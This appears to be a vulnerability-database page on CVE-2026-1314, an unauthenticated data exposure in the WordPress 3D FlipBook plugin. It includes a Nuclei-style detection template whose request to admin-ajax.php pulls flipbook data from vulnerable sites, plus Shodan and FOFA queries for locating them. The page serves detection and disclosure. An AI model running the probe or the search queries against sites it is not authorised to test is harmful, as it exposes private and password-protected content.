/Vulnerability Library

WordPress 3D FlipBook <= 1.16.17 - Information Disclosure

CVE-2026-1314
Verified

Description

WordPress 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin versions <= 1.16.17 contain a missing authorization vulnerability in multiple AJAX endpoints. The fb3d_send_posts_in, fb3d_send_post_pages, fb3d_send_posts_in_pages, fb3d_send_posts_in_first_page, and fb3d_send_post_first_page handlers are registered with wp_ajax_nopriv hooks but fail to verify the post status of requested flipbook entries. This allows unauthenticated attackers to retrieve full metadata, PDF URLs, and configuration data of private, draft, and password-protected flipbook posts.

Severity

Medium

CVSS Score

5.3

Exploit Probability

3%

Affected Product

interactive_3d_flipbook

Published Date

April 15, 2026

Template Author

theamanrawat

CVE-2026-1314.yaml
id: CVE-2026-1314

info:
  name: WordPress 3D FlipBook <= 1.16.17 - Information Disclosure
  author: theamanrawat
  severity: medium
  description: |
    WordPress 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin versions <= 1.16.17 contain a missing authorization vulnerability in multiple AJAX endpoints. The fb3d_send_posts_in, fb3d_send_post_pages, fb3d_send_posts_in_pages, fb3d_send_posts_in_first_page, and fb3d_send_post_first_page handlers are registered with wp_ajax_nopriv hooks but fail to verify the post status of requested flipbook entries. This allows unauthenticated attackers to retrieve full metadata, PDF URLs, and configuration data of private, draft, and password-protected flipbook posts.
  impact: |
    Unauthenticated attackers can access sensitive flipbook metadata, potentially exposing confidential information.
  remediation:
    Upgrade the 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin to version 1.16.18 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/wordpress-3d-flipbook-pdf-embedder-pdf-flipbook-viewer-flipbook-image-gallery-plugin-1-16-17-missing-authorization-to-unauthenticated-private-draft-flipbook-data-exposure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cve-id: CVE-2026-1314
    epss-score: 0.03117
    epss-percentile: 0.86998
  metadata:
    verified: true
    max-request: 2
    vendor: iberezansky
    product: interactive_3d_flipbook
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
    fofa-query: body="/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,3d-flipbook,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "3D FlipBook")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=fb3d_send_posts HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":0'
          - '"title":'
          - '"post_type":"3d-flip-book"'
          - '"post_name":""'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210082d4b689c0e311b01920070b680bca2f5ce4ef6fd4d4ed5ce6ec4e6bb807cb2d022100c98dfb89481df5220a70524fa4ea330c26aeabbc1f7b31394b5d96fce963efef:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-1314
CWE ID:
cwe-862

References

https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/wordpress-3d-flipbook-pdf-embedder-pdf-flipbook-viewer-flipbook-image-gallery-plugin-1-16-17-missing-authorization-to-unauthenticated-private-draft-flipbook-data-exposure-vulnerabilityhttps://nvd.nist.gov/vuln/detail/CVE-2026-1314

Remediation Steps

Upgrade the 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin to version 1.16.18 or later.